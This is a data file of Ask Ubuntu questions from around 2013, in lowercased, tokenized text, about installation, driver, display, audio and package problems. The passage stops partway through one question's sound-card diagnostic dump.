292645	kubuntu 12.10 - problem with netbeans 7.3 and java	i have kubuntu 12.10 and i have installed netbeans from official site ( https : //netbeans.org/downloads/ ) . before i had already installed java from java ppa repository ppa : webupd8team/java ( https : //launchpad.net/~webupd8team/+archive/java ) . in particular i have manually installed java-8-installer from repository manager . the problem is that after installation netbeans works fine , but after computer reboot if i open it , just the netbeans splash screen is shown and the it closes . here is the output from terminal of usr/local/netbeans-7.3/bin/netbeans java hotspot ( tm ) 64-bit server vm warning : ignoring option maxpermsize=384m ; support was removed in 8.0 java hotspot ( tm ) 64-bit server vm warning : ignoring option permsize=32m ; support was removed in 8.0 how to solve it ? thanks
292648	how can i add a pip based dependency to a quickly project ?	there is a great topic here about dependencies from ubuntu repositories . but my app depends on python package , which has to be install with sudo pip install package . can i add this kind of dependency to my app ? or at least make quickly run this command , when installing my app ? edit : this is now filed as a bug here .
292655	during installation of ubuntu 12.04 , gets stuck on booting screen ? , also , unable to upgrade from ubuntu 10.10 ?	i tried installing ubuntu 12.04 from dvd disk ( clean install ) . but it gets stuck on the loading/booting screen . on pressing esc , i get some errors as follows : pwconv failed to change the mode of /etc/passwd- to 0600 and in the end this is shown , after which installation just gets stuck , i can do nothing except switching off the power source : starting crash report submission daemon [ ok ] system : dell vostro 1440 core i3 ( 2nd gen ) intel hd graphics currently i have ubuntu 10.10 ( freshly installed from http : //old-releases.ubuntu.com/releases/10.10/ ) and wanted to upgrade to 12.04 , but am unable to manually upgrade as authentication fails in update manager . also , i am not able to download applications from ubuntu software centre and it asks me to check my network/internet .
292658	problems with apt-get install	i 've installed ubuntu recently and i 've been trying to install some programs using apt-get but it never seems to work , not even apt-get update works , here 's what i get when i try to install something , in this case : java 's jdk-7 using : apt-get install openjdk-7-jre-headless here 's what i get : reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : linux-headers-3.2.0-29 linux-headers-3.2.0-29-generic-pae use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 24 not upgraded . mkhas @ mkhas-inspiron-3520 : ~/downloads $ sudo apt-get install openjdk-7-jre-headless reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : linux-headers-3.2.0-29 linux-headers-3.2.0-29-generic-pae use 'apt-get autoremove ' to remove them . the following extra packages will be installed : ca-certificates-java icedtea-7-jre-jamvm java-common openjdk-7-jre-lib tzdata-java suggested packages : default-jre equivs sun-java6-fonts ttf-dejavu-extra fonts-ipafont-gothic fonts-ipafont-mincho ttf-telugu-fonts ttf-oriya-fonts ttf-kannada-fonts ttf-bengali-fonts the following new packages will be installed : ca-certificates-java icedtea-7-jre-jamvm java-common openjdk-7-jre-headless openjdk-7-jre-lib tzdata-java 0 upgraded , 6 newly installed , 0 to remove and 24 not upgraded . need to get 44.1 mb of archives . after this operation , 63.5 mb of additional disk space will be used . do you want to continue [ y/n ] ? y warning : the following packages can not be authenticated ! openjdk-7-jre-lib ca-certificates-java tzdata-java java-common openjdk-7-jre- headless icedtea-7-jre-jamvm install these packages without verification [ y/n ] ? y 0 % [ connecting to lb.archive.ubuntu.com ( 91.189.91.13 ) ] and it just get stuck at 0 % edit : yes , the internet is working fine on my system . one thing i tried is changing the mirror server from which it 's supposedly retrieving the packages from lb.archives.ubuntu.com to archives.ubuntu.com in /etc/apt/sources.list but it says that that file is read only and i ca n't make any changes to it . i tried updating apt-get through apt-get update but i get this whenever i try to do that : e : could not open lock file /var/lib/apt/lists/lock - open ( 13 : permission denied ) e : unable to lock directory /var/lib/apt/lists/ e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? edit : issue resolved , i was n't using sudo apt-get update and was only using apt-get update
292671	new to ubuntu ... installation problem ... !	downloaded ubuntu-12.10-desktop-amd64.iso from official website and created the bootable pen drive using universal usb installer . then i booted with it and when asked to select installation type , i selected 'something else' i have windows 8 os already installed on this laptop with intel i5 processor . is my selected option 'something else ' right ? i want ubuntu to install in the selected ntfs drive /dev/sda6 . but when i pressed install now button , an error occurred saying : no root file system defined . please correct this from the partitioning menu . any help would be really appreciated . ps : i 'm new to ubuntu as well linux itself .
292674	huawei e367 usb mode switch	hi ! i tried mode switching , but it always fails to switch . the usb storage is detached , but the mode switching fails and the product id stays at `` 1446 '' and does n't change to `` 1506 '' . here is the script that i am using : defaultvendor= 0x12d1 defaultproduct=0x1446 targetvendor= 0x12d1 targetproductlist= '' 1001,1406,140b,140c,1412,141b,14ac,1506 '' checksuccess=20 messageendpoint= 0x01 messagecontent= '' 55534243123456780000000000000011062000000100000000000000000000 '' source : http : //wiki.gentoo.org/wiki/huawei_e367 .
292678	should i use ubuntu 10.04 server since the desktop version is not supported anymore	i have a netbook , and ubuntu 10.04 expires tomorrow . should i install the server version of ubuntu 10.04 and install x on top of that ? would what work for support ? i love 10.04 only because it runs very smoothly on my netbook . 12.04 and 1304 are very slow on my machine .
292679	installing ubuntu on an mdr disk - problems !	i have an mdr disk with windows 8 installed and system reserved partition . i have tried installing ubuntu from both disk and usb , and it just can not pick up on my partition table either way . it thinks i have an empty disk . i tried formatting , installing ubuntu , and then windows , but the exact same problem happened - windows could only see an empty disk . when i have windows installed , windows installation media can see my partitions fine , and the same with ubuntu . i 'm guessing this is because my windows disk refuses to install in uefi , and my ubuntu disk refuses to install in bios . why is this ? i thought that either could install either way without a problem . in my boot menu , i am offered two options : sandisk [ uefi ] sandisk i assumed that the uefi selection would install ubuntu in uefi , whereas the option without it would install in bios . they both seem the same to me , though - maybe i 'm just being stupid .
292686	macxchange script to change mac and hostname in ubuntu 12.04	i 'm trying to adapt a script in backtrack to work with ubuntu . i keep getting an error on line 14 which is the `` if [ $ ? == 0 ] ; then '' line the script was found on http : //pctechtips.org/script-to-change-mac-and-hostname-in-backtrack/ the code is below # ! /bin/bash # author : jorge l. vazquez # purpose : this script will change the mac address to random # and will pick a random word from password.lst in jtr for hostname # change variables `` interface '' and `` file '' to your settings # also macchanger needs to be installed interface=eth0 file=/pentest/passwords/jtr/password.lst word= $ ( sort -r $ file | head -1 ) # changing mac address to random ifconfig $ interface down > /dev/null if [ $ ? == 0 ] ; then printf `` % s\nchanging mac address ... \n '' macchanger -r $ interface else printf `` % sscript encounter an error , sorry ... \n '' exit 1 fi # changing hostname to random word from password.lst printf `` % s\nchanging hostname ... \n '' oldhost= $ ( hostname ) hostname $ word if [ $ ? == 0 ] ; then printf `` % sprevius hostname : $ oldhost \n '' printf `` % srandom hostname : $ word \n '' else printf `` % sscript encounter an error , sorry ... \n '' exit 1 fi # putting interface up ifconfig $ interface up > /dev/null printf `` \n '' # end and the wordlist file for the hostfile ( password.lst ) looks like this # a couple of merged /etc/hosts files -- # 4000ex a-lhi-bbn-01 a-lhi-sri-03 a00 a1 a2 i run the script using sh filename.sh and i 've given it executable access and macchanger is installed but i still get an error
292689	version 12.04.2 crashed when booted from a usb	i 've been trying to run ubuntu 12.04 on my new bespoke computer . i do n't have a hdd as i am saving for a decent one and have been trying to run linux of off a usb boot disc . i can load up on the `` try without installing '' option but every time i use the update manager or apt-get upgrade the kernel experiences some fatal problem and is unable to load anything following a restart . there is a 4gb persistent file so that 's not the problem . is anyone else experiencing this issue and what can i do to solve it . i tried again earlier and got a fatal error loading kernel 3.5.0-23 ( file does n't exist ) i 'd just updated everything , it should exist ! i also saw a problem with the canonical . if it had n't crashed so much i 'd provide better notes but it just became impossible : (
292692	how can i boot windows 8 and ubuntu 13.04 on a pc with an efi bootloader ?	i just bought a lenovo ideapad z400 . i installed the ubuntu 13.04 without problem . now , i cna't boot the windows 8 . eaither in secure boot mode enabled or disabled . i am frustrated . this is my boot-repair auto generated file . http : //paste.ubuntu.com/5645521/ in the grub boot menu , there are several options , windows 8 loader , windows 8 recovery uefi . i can get into windows 8 with recovery uefi . however , the regular windows 8 does n't work . and i do n't know what 's the difference between these two windows mode and if there is any solution to solve . if i load regular windows 8 , it tells me no drivemap command found , and invalid efi ...
292696	ubuntu crashes when on battery power	i 've got an hp 2510p ( with a mic problem.. ) with ubuntu 13.04 . when i use it plugged in to the a.c. supply , so far so good . when i disconnect the a.c. supply , ubuntu crashes . same thing happens when i turn my laptop on on battery ... and when i say crashes , i mean no control ... .not even the mouse . any help ?
292697	fonts corrupted	fonts seems to be corrupted in unity in my system after an update yesterday . it seems certain characters are refusing to display ( please see attached screenshot ) , or gets displayed in same color as background . there is no such problem in gnome shell . however i prefer unity . please help me resolve this . i have attached screenshots for better understanding click on the image to see a full-resolution version .
292699	ubuntu 13.04 startup freezes ( ati radeon rv730 )	since i 've updated from 12.10 to 13.04 , desktop environment freezes on each startup . my gpu is ati radeon hd 4670 ( rv730 ) , driver fglrx-updates is installed , linux 3.8.0-19-generic , 64-bit system . should i use another driver to fix the problem ? had anybody have the same problem ?
292712	my object code can not be executed	i compile my c code with gcc and it creates an obj code but when i tried to run it it gives can not execute binary file error how can i solve this problem can you help me ? gcc -c virtualaddressmanager.c -o vam ./vam.exe can not execute binary file
292715	ubuntu live usb is not working as expected	i have tried with both linux live usb creator and universal usb creator . the result is the same . i used the ubuntu 12.04 image when was asked to provide the iso . and when i booted via the usb it presents the installation option . but what i wanted was a live usb ie that will boot from the usb and it will have an in memory os with shell where i can execute commands . besides it will have an option to install to hard disk if wanted . this is the way i have a centos live usb working . but i am not sure what i am doing wrong ?
292720	misaligned partition	i 've just installed ubuntu 12.04 . i did n't put my data yet , i want before to make sure that the installation is fine . and i get disk utility warning about misaligned partition . i have / on sda1 and sda2 is extended partition with sda5 for swap and sda6 for /home . there is no other partition on the disc . from other questions about the same problem i 've understood that i should boot my computer from live usb and fix the problem with gparted . the problem is that when i boot my computer from live usb stick and enter try mode , both primary partitions are mounted , so i ca n't do any operation on it . since i do n't have any data yet , i can even re-install the system , but i should know how do set the installer to align the partitions in right way . i 've chosen not to use the install option without partitioning , since i 'd like to have /home on separate partition . i could also try to fix it with the present installation , but i do n't know how to unmount swap partition ( and i 'm not sure if it 's reasonable ) . here is the output of fdisk -lu : disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00027dec device boot start end blocks id system /dev/sda1 * 2048 29999103 14998528 83 linux /dev/sda2 30001150 625141759 297570305 5 extended partition 2 does not start on physical sector boundary . /dev/sda5 30001152 33998847 1998848 82 linux swap / solaris /dev/sda6 34000896 625141759 295570432 83 linux disk is ata st320lt007-9zv142 thanks
292721	problem installing gfortran	i have just installed ubuntu 13.04 on my computer , then tried to install gfortran using the command : sudo apt-get install gfortran in a terminal and it says : e : unable to locate package gfortran how to fix this ?
292728	broken file type associations after running update-mime-database	after running sudo update-mime-database /usr/share/mime my gnome does n't recognize any file types anymore . in nautilus all files are now text/plain type and all now open with gedit by default . gnome-commander does the same . i guess that it 's not that file associations are broken but rather file type recognition problem . tried to ( not in that order ) : rerun update-mime-database several times reinstal package gnome-mime-data delete ~/.local/share/applications/* logout and login many times reboot nothing helped so far . my system : ubuntu 10.04 lts ( lucid lynx ) gnome 2.30.2
292729	keyboard layout identical to `` us extended '' on macbook pro	i am running ubuntu 13.04 on a dell machine and i want to have the exact same keyboard layout as i have on my other machine , which is a macbook pro with an international english keyboard . on the mac i have the keyboard set to us extended . on ubuntu i have the layout set to english ( macintosh ) which gives me this layout : however what i really want is an exact copy of the us extended on my mac , which looks like this : and with the following modifiers with the alt key pressed : the layouts are similar but there are small differences , in particular producing the character ë modifier on mac is alt-w , while under ubuntu it 's alt-h . i 've tried all the english layouts on ubuntu but none match this exactly . any suggestions ? i 'm not adverse to writing a layout config myself , if that 's what it takes , but a few pointers would be welcome !
292732	interference from graphics card ?	i have been using ubuntu for a while now and have always had an issue with interference . it seems that the graphics driver i am using affects when the interference occurs and how loud it is . if i used the nouveau driver the interference is terrible and i get both hardware and audio interference . a loud high pitch squeal comes from my graphics card as well as interference down my headset . people on skype have said they can hear it as well . however this problem does not occur when using windows and so it leads me to believe that there is something wrong with the drivers , but i have tried many different versions of ubuntu and even fedora and still had the same problem . i have changed graphics drivers but have not managed to get rid of this interference . it is nothing to do with the hardware placement as it does not happen in windows . what is going on ? the interference often occurs when loading things at high frame rate such as the start of games and so this makes me think it is the graphics card , but why does it only happen in linux and not windows ? i am using an nvidia gtx 285 with proprietary driver .
292734	change ownership of external hard drive ?	i recently bought an external hard drive on ebay , i received it and plugged it into my laptop and when i tried moving files onto it , it refused me to drag them on . i looked into the properties of the drive and only user # 99 in group 99 could edit settings and files on the drive . is there any way that i can change this ? i am running ubuntu 13.4 by the way . thanks to anybody that can : )
292735	wicd not working	i really do n't like the default ubuntu network manager . i like it to have more details and stuff about the networks around me . so i wanted to install wicd network manager . but when i tried to install it on ubuntu 13.04 with this link giving me instructions : https : //help.ubuntu.com/community/wicd . but when i installed it and everything it was asking me for a password for it to access my internet card ... .. but it was n't my user account password and i could n't get it to work at all . can any of you help me in installing it or finding my password ?
292739	troubleshooting poor performance with ati hd 5800 gpu	i am attempting again to solve problems between ati radeon hd 5800 series ( 5830 ) gpu and ubuntu . three months ago i posted : display difficulties with ubuntu 12.10 , dual monitors , and ati hd 5800 i have 3 months of experience to draw from . now i can be a little more concise once i get a sense of direction . my goal is to solve these symptoms : hd video playback stutters , and display still tears when dragging windows . here is a basic outline of my system : ubuntu 13.04 kernel 3.8.0-20 ati radeon hd 5830 fglrx 9.1.11 x server 1.13.3 gnome 3.6.3.1 dual monitors:1080p and 720p i am going to run the phoronix-test-suite tonight , and post the graphics specific results , to evaluate progress . i am not attached to propriatary drivers ; if there is a fix , i would love to implement it . thank you philanthropic debuggers , i am looking forwards to finally fixing this ! = ) -j
292742	installing iraf problem	i 've installed iraf v216 on my desktop computer without any difficulties but installing it on laptop ( hp pavilion g6 ) is giving me a lots of trouble . i ca n't solve this particular problem , and i do n't know what to do , i 'm new to linux , but i can follow your steps easily . ; ) here is the problem : iraf installation passed , x11iraf too , ds9 also passed but when i try to run it it says bash : /usr/local/bin/xgterm : no such file or directory and xgterm is located in `` /usr/local/bin/ '' . i have no idea what to do from here .
292743	disable security warning	how i disable unverified publisher security warning box ? i want setup my ubuntu to start this program after restart automaticaly .
292751	issues installing wireless network driver	i recently did a full install of ubuntu 13.04 , well my asus pce-n15 ( which seems to have a common issue in ubuntu ) seems to be functioning horribly . in system monitor it fluctuates from about 0-1.2kb/s receiving and sent , it shows it 's connected to the router , and it 's worked 100 % in windows 8 . i tried installing the driver update package for the wireless card but get this error when i try to make the makefile i get this error : update # 2 make [ 1 ] : entering directory /usr/src/linux-headers-3.8.0-19-generic' cc [ m ] /home/anthony/desktop/realtek/base.o in file included from /home/anthony/desktop/realtek/base.c:39:0 : /home/anthony/desktop/realtek/pci.h:247:1 : error : implicit declaration of function ‘rtl_pci_probe’ [ -werror=implicit-function-declaration ] /home/anthony/desktop/realtek/pci.h:247:31 : error : expected expression before ‘struct’ cc1 : some warnings being treated as errors make [ 2 ] : *** [ /home/anthony/desktop/realtek/base.o ] error 1 make [ 1 ] : *** [ _module_/home/anthony/desktop/realtek ] error 2 make [ 1 ] : leaving directory/usr/src/linux-headers-3.8.0-19-generic' make : * [ all ] error 2 root @ anthony-desktop : /home/anthony/desktop/realtek # *update* i did the patching of the previous links but i get this now : '' make [ 2 ] : entering directory /usr/src/linux-headers-3.8.0-19-generic' install /home/anthony/desktop/r8169-6.017.00/src/r8169.ko ca n't read private key depmod 3.8.0-19-generic make [ 2 ] : leaving directory/usr/src/linux-headers-3.8.0-19-generic' make [ 1 ] : leaving directory `/home/anthony/desktop/r8169-6.017.00/src'** '' make -c /lib/modules/3.8.0-19-generic/build m=/home/anthony/desktop/linux modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.8.0-19-generic' cc [ m ] /home/anthony/desktop/linux/base.o /home/anthony/desktop/linux/base.c : in function ‘_rtl_init_mac80211’ : /home/anthony/desktop/linux/base.c:319:6 : error : ‘ieee80211_hw_beacon_filter’ undeclared ( first use in this function ) /home/anthony/desktop/linux/base.c:319:6 : note : each undeclared identifier is reported only once for each function it appears in /home/anthony/desktop/linux/base.c : in function ‘rtl_action_proc’ : /home/anthony/desktop/linux/base.c:861:25 : error : ‘rx_flag_mactime_mpdu’ undeclared ( first use in this function ) /home/anthony/desktop/linux/base.c : in function ‘rtl_send_smps_action’ : /home/anthony/desktop/linux/base.c:1414:16 : error : ‘struct < anonymous > ’ has no member named ‘sta’ make [ 2 ] : *** [ /home/anthony/desktop/linux/base.o ] error 1 make [ 1 ] : *** [ _module_/home/anthony/desktop/linux ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.8.0-19-generic' make : *** [ all ] error 2 lspci -nn shows : 00:00.0 host bridge [ 0600 ] : intel corporation xeon e3-1200 v2/3rd gen core processor dram controller [ 8086:0150 ] ( rev 09 ) 00:01.0 pci bridge [ 0604 ] : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port [ 8086:0151 ] ( rev 09 ) 00:14.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb xhci host controller [ 8086:1e31 ] ( rev 04 ) 00:16.0 communication controller [ 0780 ] : intel corporation 7 series/c210 series chipset family mei controller # 1 [ 8086:1e3a ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 [ 8086:1e2d ] ( rev 04 ) 00:1b.0 audio device [ 0403 ] : intel corporation 7 series/c210 series chipset family high definition audio controller [ 8086:1e20 ] ( rev 04 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 1 [ 8086:1e10 ] ( rev c4 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 2 [ 8086:1e12 ] ( rev c4 ) 00:1c.3 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 4 [ 8086:1e16 ] ( rev c4 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 [ 8086:1e26 ] ( rev 04 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation z77 express chipset lpc controller [ 8086:1e44 ] ( rev 04 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 7 series/c210 series chipset family 6-port sata controller [ ahci mode ] [ 8086:1e02 ] ( rev 04 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 7 series/c210 series chipset family smbus controller [ 8086:1e22 ] ( rev 04 ) 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati pitcairn xt [ radeon hd 7870 ghz edition ] [ 1002:6818 ] 01:00.1 audio device [ 0403 ] : advanced micro devices [ amd ] nee ati cape verde/pitcairn hdmi audio [ radeon hd 7700/7800 series ] [ 1002 : aab0 ] 03:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 06 ) 04:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter [ 10ec:8178 ] ( rev 01 ) lshw -c networkshows : *-network description : ethernet interface product : rtl8111/8168 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 06 serial : d4:3d:7e:96:1a:8a size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl8168e-3_0.0.4 03/27/12 latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:43 ioport : d000 ( size=256 ) memory : f7d04000-f7d04fff memory : f7d00000-f7d03fff *-network description : wireless interface product : rtl8188ce 802.11b/g/n wifi adapter vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : wlan0 version : 01 serial : 30:85 : a9 : f3 : b6:14 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8192ce driverversion=3.8.0-19-generic firmware=n/a ip=192.168.0.3 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:19 ioport : c000 ( size=256 ) memory : f7c00000-f7c03fff
292755	menu bar in top of desktop not visible for some appliations like rhythmbox	when starting and activating `` rhythmbox '' there is no menubar available since installing ubuntu 13.04 using an existing user profile of a home-partition from previous versions of ubuntu . when i create a new user and log in as this new user , i get the menu bar . but when i log in back to my `` old '' user profile , the menu bar is gone . i already tried `` unity -- reset '' , which does not solve the problem . can anyone point me how to reset my user profile in a way to display the menu bar ?
292757	ubuntu touch desktop ?	does ubuntu touch have a desktop mode ? i mean with like a full unity inferface so you can use your tablet like a regular ubuntu pc . heard this is not possible due to the display server . i did however see this a few months back and wondering if its on touch : http : //www.ubuntu.com/phone/ubuntu-for-android
292759	how to find out root password	i just installed ubuntu desktop 13.04 i need the root access and need to know the root password during installation , i left it blank . how can find out my root password ? thanks . somner
292763	compiz crashes with in 13.04 when plugging a second monitor in	since i have updated to ubuntu 13.04 , every time when i plug in a second monitor compiz crashes . sometimes , when my computer has a high cpu value , compiz also crashes . when compiz crashes , the launcher-bar and the menu and frames of the windows are missing and i have to restart my computer . i think the problem could be the graphic card : i have a hp probook 4720s . when i run lspci , the following line shows my grapic card : `01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati rv710/m92 [ mobility radeon hd 4350/4550 ] ` if you need more information , tell me how to gather the needed information and i will post it . thanks for your help , kevin
292771	connecting to a printer	i recently upgraded to 13.04 and i can not connect to my printer . it worked on both 12.04 and 12.10 . i have an epson artisan 810 . ubuntu is n't recognizing the printer over the network . i have tried downloading drivers but none of them have worked .
292773	wireless connects to network , but there is no internet	i installed ubuntu 13.04 on asus m50v laptop . it connected to my wireless network , but there is no internet . i can see that laptop got its ip number and is connected . ping command is not working even if i write ip directly . even router 's ip . all my other devices have internet on that wireless network . what can i do to find where is the problem ?
292776	ubuntu + kde-standard + dual monitor	after couple of years , i decided to return to ubuntu , from debian ( sid ) . i used to work with kde , so i installed ubuntu 13.04 and `` kde-standard '' on my laptop . short : '' display configuration '' is not available in ubuntu+kde-standard , so i can not configure two displays ... and default configuration is wrong . tested ubuntu+unity and ubuntu+gnome3 ... both works well . installing kubuntu insted ubuntu works , but i prefer ubuntu . long : i have two displays for my laptop : the laptop one and an external display that is connected throw hdmi port . under ubuntu+unity , i can configure resolution and displays relative position ( one relative to the other ) ... but not under kde ... and kde does not use automatically the right configuration , it uses a mirrored screen , with 4:3 resolution on both screens . in kde , this should be fixed changing the configuration in `` system settings - > display and monitor '' .. where `` display configuration '' menu should be available , together with `` screen locker '' . but there is no `` display configuration '' menu , only `` screen locker '' , so i can not change resolution , what screen is the primary one , relative position , etc . tried gnome 3 under ubuntu and settings works perfectly . now , i have installed kubuntu instead ubuntu and there is `` display configuration '' menu ... but i prefer > > > > ubuntu ... x_x can someone help me ? thank you !
292781	build-essential ca n't find gcc	i have ubuntu 12.04 installed . i just installed the gcc-4.6 and g++-4.6 from the same os media . however when i attempted to install the build-essential package from the same os media , it says gcc is not installed ( what kind of a joke is this ? ) . the version it is require > = 4.4 and the version installed = 4.6 . how to get out of this crap ? thanks
292784	microsoft keyboard shortcuts	i am using microsoft keyboard ( with ubuntu 12.04 kde 64bit ) and i have some keys there . for example calculator key and start keys . i want start calculator as i press calculator key and display ubuntu start menu as i press start key . the output of xev | grep key for these keys is : keys : 4294967265 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 state 0x10 , keycode 104 ( keysym 0xff8d , kp_enter ) , same_screen yes , state 0x10 , keycode 148 ( keysym 0x1008ff1d , xf86calculator ) , same_screen yes , state 0x10 , keycode 148 ( keysym 0x1008ff1d , xf86calculator ) , same_screen yes , state 0x10 , keycode 148 ( keysym 0x1008ff1d , xf86calculator ) , same_screen yes , state 0x10 , keycode 148 ( keysym 0x1008ff1d , xf86calculator ) , same_screen yes ,
292786	static background noise while using new headset	today i bought a new gaming headset ( gx-gaming lychas ) , and when i tried to record some gameplay-comentary i noticed that there always is a static background noise , i just recorded an example so you guys can listen it ( no downloaded needed ) : http : //www47.zippyshare.com/v/65167832/file.html i 'm using kubuntu 13.04 and kernel version is 3.8.0-19 , my laptop is an acer travelmate 5760z , i tried tons of configurations on alsamixer and none of them made result , i really need to get this working so any kind of help will be very aprecciated . cat /proc/asound/cards : 0 [ pch ] : hda-intel - hda intel pch hda intel pch at 0xc6400000 irq 44 cat /proc/asound/card0/codec # 0 codec : conexant cx20588 address : 0 afg function id : 0x1 ( unsol 1 ) vendor id : 0x14f1506c subsystem id : 0x10250574 revision id : 0x100003 no modem function group found default pcm : rates [ 0x160 ] : 44100 48000 96000 bits [ 0xe ] : 16 20 24 formats [ 0x1 ] : pcm default amp-in caps : n/a default amp-out caps : n/a state of afg node 0x01 : power states : d0 d1 d2 d3 d3cold clkstop epss power : setting=d0 , actual=d0 gpio : io=4 , o=0 , i=0 , unsolicited=1 , wake=0 io [ 0 ] : enable=0 , dir=0 , wake=0 , sticky=0 , data=0 , unsol=0 io [ 1 ] : enable=0 , dir=0 , wake=0 , sticky=0 , data=0 , unsol=0 io [ 2 ] : enable=0 , dir=0 , wake=0 , sticky=0 , data=0 , unsol=0 io [ 3 ] : enable=0 , dir=0 , wake=0 , sticky=0 , data=0 , unsol=0 node 0x10 [ audio output ] wcaps 0xc1d : stereo amp-out r/l control : name= '' headphone playback volume '' , index=0 , device=0 controlamp : chs=3 , dir=out , idx=0 , ofs=0 control : name= '' headphone playback switch '' , index=0 , device=0 controlamp : chs=3 , dir=out , idx=0 , ofs=0 device : name= '' cx20588 analog '' , type= '' audio '' , device=0 amp-out caps : ofs=0x4a , nsteps=0x4a , stepsize=0x03 , mute=1 amp-out vals : [ 0x4a 0x4a ] converter : stream=8 , channel=0 pcm : rates [ 0x560 ] : 44100 48000 96000 192000 bits [ 0xe ] : 16 20 24 formats [ 0x1 ] : pcm power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 node 0x11 [ audio output ] wcaps 0xc1d : stereo amp-out r/l control : name= '' speaker playback volume '' , index=0 , device=0 controlamp : chs=3 , dir=out , idx=0 , ofs=0 control : name= '' speaker playback switch '' , index=0 , device=0 controlamp : chs=3 , dir=out , idx=0 , ofs=0 amp-out caps : ofs=0x4a , nsteps=0x4a , stepsize=0x03 , mute=1 amp-out vals : [ 0x80 0x80 ] converter : stream=8 , channel=0 pcm : rates [ 0x560 ] : 44100 48000 96000 192000 bits [ 0xe ] : 16 20 24 formats [ 0x1 ] : pcm power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 node 0x12 [ audio output ] wcaps 0x611 : stereo digital converter : stream=0 , channel=0 digital : digital category : 0x0 iec coding type : 0x0 pcm : rates [ 0x160 ] : 44100 48000 96000 bits [ 0xe ] : 16 20 24 formats [ 0x5 ] : pcm ac3 power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 node 0x13 [ beep generator widget ] wcaps 0x70000c : mono amp-out control : name= '' beep playback volume '' , index=0 , device=0 controlamp : chs=1 , dir=out , idx=0 , ofs=0 control : name= '' beep playback switch '' , index=0 , device=0 controlamp : chs=1 , dir=out , idx=0 , ofs=0 amp-out caps : ofs=0x07 , nsteps=0x07 , stepsize=0x0f , mute=0 amp-out vals : [ 0x00 ] node 0x14 [ audio input ] wcaps 0x100d1b : stereo amp-in r/l control : name= '' capture volume '' , index=0 , device=0 controlamp : chs=3 , dir=in , idx=0 , ofs=0 control : name= '' capture switch '' , index=0 , device=0 controlamp : chs=3 , dir=in , idx=0 , ofs=0 device : name= '' cx20588 analog '' , type= '' audio '' , device=0 amp-in caps : ofs=0x4a , nsteps=0x50 , stepsize=0x03 , mute=1 amp-in vals : [ 0x50 0x50 ] [ 0x80 0x80 ] [ 0x80 0x80 ] [ 0x80 0x80 ] converter : stream=4 , channel=0 sdi-select : 0 pcm : rates [ 0x160 ] : 44100 48000 96000 bits [ 0xe ] : 16 20 24 formats [ 0x1 ] : pcm power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 4 0x17* 0x18 0x23 0x24 node 0x15 [ audio input ] wcaps 0x100d1b : stereo amp-in r/l amp-in caps : ofs=0x4a , nsteps=0x50 , stepsize=0x03 , mute=1 amp-in vals : [ 0x4a 0x4a ] [ 0x4a 0x4a ] [ 0x4a 0x4a ] [ 0x4a 0x4a ] converter : stream=0 , channel=0 sdi-select : 0 pcm : rates [ 0x160 ] : 44100 48000 96000 bits [ 0xe ] : 16 20 24 formats [ 0x1 ] : pcm power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 4 0x17* 0x18 0x23 0x24 node 0x16 [ audio input ] wcaps 0x100d1b : stereo amp-in r/l amp-in caps : ofs=0x4a , nsteps=0x50 , stepsize=0x03 , mute=1 amp-in vals : [ 0x4a 0x4a ] [ 0x4a 0x4a ] [ 0x4a 0x4a ] [ 0x4a 0x4a ] converter : stream=0 , channel=0 sdi-select : 0 pcm : rates [ 0x160 ] : 44100 48000 96000 bits [ 0xe ] : 16 20 24 formats [ 0x1 ] : pcm power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 4 0x17* 0x18 0x23 0x24 node 0x17 [ audio selector ] wcaps 0x30050d : stereo amp-out control : name= '' mic boost volume '' , 